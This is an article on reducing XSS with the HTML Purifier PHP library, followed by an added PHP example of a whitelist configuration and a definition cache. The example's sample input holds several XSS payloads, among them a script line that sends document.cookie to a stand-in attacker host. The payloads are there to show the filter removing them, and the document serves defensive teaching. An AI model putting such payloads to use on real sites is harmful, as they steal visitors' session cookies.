How to Minimize XSS Attacks

Jan 16, 2008 15:49 GMT

Web application security covers both client-side and server-side code. Vulnerabilities in the source code of either can be discovered and used in attacks against your web pages or against the programs running on the server.

For example, in a database-driven application a simple web form can, in the absence of proper input handling, allow code injection into the database (SQL injection) that lets an attacker destroy your data or website content. On the side of HTML and client-side scripts, the typical attack is cross-site scripting, also known as XSS: attacker-supplied markup or script is stored or reflected by the application and then rendered in other users' browsers. Insecure HTML fragments can be neutralized with suitable filters.

HTML Purifier is a PHP library whose role is to filter HTML. It removes XSS vectors and, at the same time, makes the markup standards compliant, as specified by the W3C (World Wide Web Consortium). Rather than blacklisting known-bad constructs, HTML Purifier blocks XSS by allowing only the elements and attributes on an audited whitelist, so anything it does not recognize is dropped instead of passed through. Its standards-compliant output can be produced for several document types, including XHTML 1.0, HTML 4.01 and XHTML 1.1.

To minimize XSS while producing clean HTML, HTML Purifier is best used together with a content management system or a WYSIWYG (What You See Is What You Get) HTML editor, since these are exactly the places where users submit rich HTML that is later displayed to other visitors. The library offers plugins for a number of such systems, including Phorum, MODx, Drupal, WordPress and CodeIgniter.

Filtering HTML with HTML Purifier can be slow under certain conditions, so using its caching mechanisms is recommended. In conclusion, this HTML filtering library is highly customizable and has a dual action: protection against XSS attacks and cleanup of the markup's syntax. The author's website provides extensive documentation as well as tips for using the library in specific practical cases.
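The following is an added example, not code from the original article or from the HTML Purifier project, showing how the three points above fit together: a whitelist configuration of allowed elements and attributes, a constructed piece of "dirty" HTML of the kind a WYSIWYG editor or CMS comment form might submit, and the on-disk definition cache that addresses the execution-time concern. The include path, the cache directory and the sample input are assumptions for illustration; the configuration keys (`HTML.Allowed`, `URI.AllowedSchemes`, `Cache.SerializerPath`, `HTML.Doctype`) are real HTML Purifier settings.

```php
<?php
// Added example: not from the original article or the HTML Purifier project.
// Assumption: HTML Purifier is installed at this path (adjust to your setup).
require_once '/path/to/htmlpurifier/library/HTMLPurifier.auto.php';

/**
 * Build a purifier with a narrow whitelist and a persistent definition cache.
 * Only the listed elements/attributes survive; script, style, iframe, on*
 * handlers and everything else not named here are dropped.
 */
function makePurifier(string $cacheDir): HTMLPurifier
{
    $config = HTMLPurifier_Config::createDefault();
    $config->set('Core.Encoding', 'UTF-8');
    // Output is normalized to this doctype (tags closed, nesting fixed).
    $config->set('HTML.Doctype', 'XHTML 1.0 Strict');
    // The whitelist: keep it as small as the editor actually needs.
    $config->set('HTML.Allowed',
        'p,br,b,i,em,strong,ul,ol,li,a[href|title],img[src|alt]');
    // Only these URI schemes are accepted in href/src; javascript: is rejected.
    $config->set('URI.AllowedSchemes',
        ['http' => true, 'https' => true, 'mailto' => true]);
    // Building the element/attribute definitions is the expensive step; the
    // serializer cache stores them on disk so later requests skip that work.
    // The directory must exist and be writable by the web server (assumed).
    $config->set('Cache.SerializerPath', $cacheDir);
    return new HTMLPurifier($config);
}

/** Filter untrusted rich-text input before storing or displaying it. */
function cleanUserHtml(HTMLPurifier $purifier, string $dirty): string
{
    return $purifier->purify($dirty);
}

// Constructed sample input: what an attacker might type into a WYSIWYG
// comment field. It mixes XSS payloads with sloppy, unclosed markup.
$dirty = <<<'HTML'
<p onmouseover="alert(1)">Hello <b>world<i>!</p>
<script>document.location='http://evil.example/?c='+document.cookie</script>
<a href="javascript:alert(document.cookie)">click me</a>
<img src="x" onerror="alert(1)">
<a href="https://example.org/page" title="ok">a safe link</a>
HTML;

$purifier = makePurifier('/tmp/htmlpurifier-cache');   // assumed cache dir
$clean = cleanUserHtml($purifier, $dirty);

// Show before/after, escaped so the demo page itself does not render them.
echo "Dirty:\n", htmlspecialchars($dirty, ENT_QUOTES, 'UTF-8'), "\n\n";
echo "Clean:\n", htmlspecialchars($clean, ENT_QUOTES, 'UTF-8'), "\n";
```

In the cleaned output the `<script>` element, the `onmouseover` and `onerror` handlers and the `javascript:` link target are gone, while the unclosed `<b>` and `<i>` are closed and the whitelisted `https:` link is kept. Two caveats for practitioners: HTML Purifier sanitizes HTML that will be placed in an HTML body context; if the same data is later written into an attribute value, a JavaScript string or a URL, it still needs the escaping appropriate to that context. And the whitelist in `HTML.Allowed` is the security boundary, so resist widening it to make an editor's output "look right" without reviewing what each added element or attribute can carry.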